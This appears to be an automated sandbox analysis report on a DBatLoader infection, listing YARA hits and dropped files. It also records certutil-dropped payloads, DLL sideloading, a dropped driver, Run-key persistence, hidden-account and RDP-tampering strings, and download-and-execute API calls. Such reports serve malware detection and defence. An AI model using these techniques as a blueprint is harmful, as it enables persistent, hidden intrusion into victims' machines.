Source: C:\Users\Public\Libraries\dbkyovyK.pif	Unpacked PE file: 29.2.dbkyovyK.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;.bss:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Unpacked PE file: 14.2.dbkyovyK.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Unpacked PE file: 29.2.dbkyovyK.pif.400000.1.unpack

Yara detected DBatLoader

Source: Yara match	File source: 8.0.pointer.com.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pointer.com.2d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.1646752088.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.1691476533.000000007EB40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1906996897.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1637088713.000002599966D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\Libraries\Kyvoykbd.PIF, type: DROPPED
Source: Yara match	File source: C:\Users\Public\pointer.com, type: DROPPED

Source: dbkyovyK.pif.8.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D2FCE0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

8_2_02D2FCE0

Source: initial sample

Static PE information: section where entry point is pointing to: .....

Source: Kyvoykbd.PIF.8.dr	Static PE information: real checksum: 0x0 should be: 0x1e3a04
Source: netutils.dll.8.dr	Static PE information: real checksum: 0x22627 should be: 0x2001d
Source: pointer.com.3.dr	Static PE information: real checksum: 0x0 should be: 0x1e3a04

Source: easinvoker.exe.8.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.8.dr	Static PE information: section name: .....
Source: netutils.dll.8.dr	Static PE information: section name: .....
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ....
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: ....
Source: netutils.dll.8.dr	Static PE information: section name: ....
Source: netutils.dll.8.dr	Static PE information: section name: ......
Source: netutils.dll.8.dr	Static PE information: section name: /4
Source: netutils.dll.8.dr	Static PE information: section name: /19
Source: netutils.dll.8.dr	Static PE information: section name: /31
Source: netutils.dll.8.dr	Static PE information: section name: /45
Source: netutils.dll.8.dr	Static PE information: section name: /57
Source: netutils.dll.8.dr	Static PE information: section name: /70
Source: netutils.dll.8.dr	Static PE information: section name: /81
Source: netutils.dll.8.dr	Static PE information: section name: /92

Source: C:\Users\Public\pointer.com	Code function: 8_3_02C04F5C push ebp; iretd	8_3_02C04F60
Source: C:\Users\Public\pointer.com	Code function: 8_3_02C02507 push FFFFFF89h; iretd	8_3_02C0250B
Source: C:\Users\Public\pointer.com	Code function: 8_3_02C0118E push ebp; retf	8_3_02C011C3
Source: C:\Users\Public\pointer.com	Code function: 8_3_02C0118E push ebp; retf	8_3_02C011C3
Source: C:\Users\Public\pointer.com	Code function: 8_3_02C04F5C push ebp; iretd	8_3_02C04F60
Source: C:\Users\Public\pointer.com	Code function: 8_3_02C02507 push FFFFFF89h; iretd	8_3_02C0250B
Source: C:\Users\Public\pointer.com	Code function: 8_3_02C0118E push ebp; retf	8_3_02C011C3
Source: C:\Users\Public\pointer.com	Code function: 8_3_02C0118E push ebp; retf	8_3_02C011C3
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D26770 push ecx; mov dword ptr [esp], edx	8_2_02D26775
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D795F8 push 02D79685h; ret	8_2_02D7967D
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D680D4 push 02D68100h; ret	8_2_02D680F8
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D30080 push 02D300C3h; ret	8_2_02D300BB
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D3007F push 02D300C3h; ret	8_2_02D300BB
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D166FA push 02D16757h; ret	8_2_02D1674F
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D166FC push 02D16757h; ret	8_2_02D1674F
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D6C69C push ecx; mov dword ptr [esp], edx	8_2_02D6C6A1
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D30630 push 02D30673h; ret	8_2_02D3066B
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D3062F push 02D30673h; ret	8_2_02D3066B
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D7874C push 02D7897Eh; ret	8_2_02D78976
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D6871C push 02D68776h; ret	8_2_02D6876E
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D24442 push 02D244BAh; ret	8_2_02D244B2
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D24444 push 02D244BAh; ret	8_2_02D244B2
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D945D4 push eax; ret	8_2_02D946A4
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D26AEC push ecx; mov dword ptr [esp], edx	8_2_02D26AF1
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D26B30 push ecx; mov dword ptr [esp], edx	8_2_02D26B35
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D2EB22 push 02D2EBCFh; ret	8_2_02D2EBC7
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D2EB24 push 02D2EBCFh; ret	8_2_02D2EBC7
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D269CC push ecx; mov dword ptr [esp], edx	8_2_02D269D1
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D1E91C push 02D1E948h; ret	8_2_02D1E940
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D4492C push 02D44997h; ret	8_2_02D4498F
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D3CFC8 push 02D3D000h; ret	8_2_02D3CFF8

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\Public\pointer.com	File created: C:\Users\Public\Libraries\dbkyovyK.pif	Jump to dropped file
Source: C:\Users\Public\pointer.com	File created: C:\Users\Public\Libraries\Kyvoykbd.PIF	Jump to dropped file
Source: C:\Windows\System32\certutil.exe	File created: C:\Users\Public\pointer.com	Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\Users\Public\pointer.com

File created: C:\Users\Public\Libraries\truesight.sys

Jump to behavior

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_00410D7A LeaveCriticalSection,NetUserAdd,NetLocalGroupAddMembers,

14_2_00410D7A

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_004036EA URLDownloadToFileW,ShellExecuteW,

14_2_004036EA

Source: C:\Users\Public\pointer.com	File created: C:\Users\Public\Libraries\dbkyovyK.pif	Jump to dropped file
Source: C:\Users\Public\pointer.com	File created: C:\Users\Public\Libraries\Kyvoykbd.PIF	Jump to dropped file
Source: C:\Users\Public\pointer.com	File created: C:\Users\Public\Libraries\truesight.sys	Jump to dropped file
Source: C:\Users\Public\pointer.com	File created: C:\Users\Public\Libraries\easinvoker.exe	Jump to dropped file
Source: C:\Users\Public\pointer.com	File created: C:\Users\Public\Libraries\netutils.dll	Jump to dropped file
Source: C:\Windows\System32\certutil.exe	File created: C:\Users\Public\pointer.com	Jump to dropped file

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\pointer.com

Jump to dropped file

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0040314B GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec,	14_2_0040314B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0040D379 lstrcatW,GetBinaryTypeW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,lstrlenW,lstrcpyW,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,lstrlenW,lstrcpyW,CopyFileW,lstrlenW,lstrcpyW,PathFileExistsW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,	14_2_0040D379
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0040CD01 GetBinaryTypeW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,lstrlenW,lstrcpyW,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,lstrlenW,lstrcpyW,CopyFileW,lstrlenW,lstrcpyW,PathFileExistsW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,	14_2_0040CD01
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0040314B GetPrivateProfileStringW,ExitProcess,GetModuleFileNameA,CharLowerW,CharLowerW,CharLowerW,lstrcmpW,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,WinExec,	25_1_0040314B
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0040D379 lstrcatW,GetBinaryTypeW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,lstrlenW,lstrcpyW,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,lstrlenW,lstrcpyW,CopyFileW,lstrlenW,lstrcpyW,PathFileExistsW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,	25_1_0040D379
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0040CD01 GetBinaryTypeW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,lstrlenW,lstrcpyW,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,lstrlenW,lstrcpyW,CopyFileW,lstrlenW,lstrcpyW,PathFileExistsW,lstrlenW,lstrcpyW,GetPrivateProfileStringW,	25_1_0040CD01

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\Public\pointer.com

Jump to dropped file

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_00410E64 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

14_2_00410E64

Source: C:\Users\Public\pointer.com	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kyvoykbd			Jump to behavior
Source: C:\Users\Public\pointer.com	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kyvoykbd			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: pointer.com, 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: pointer.com, 00000008.00000002.1723986250.00000000123C8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: pointer.com, 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: pointer.com, 00000008.00000003.1696692635.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: pointer.com, 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: pointer.com, 00000008.00000002.1725155820.0000000012645000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000000E.00000001.1696850208.000000000041A000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif, 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000000E.00000003.1719337894.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif, 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif, 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000000E.00000003.1719249332.000000002FDF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif, 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
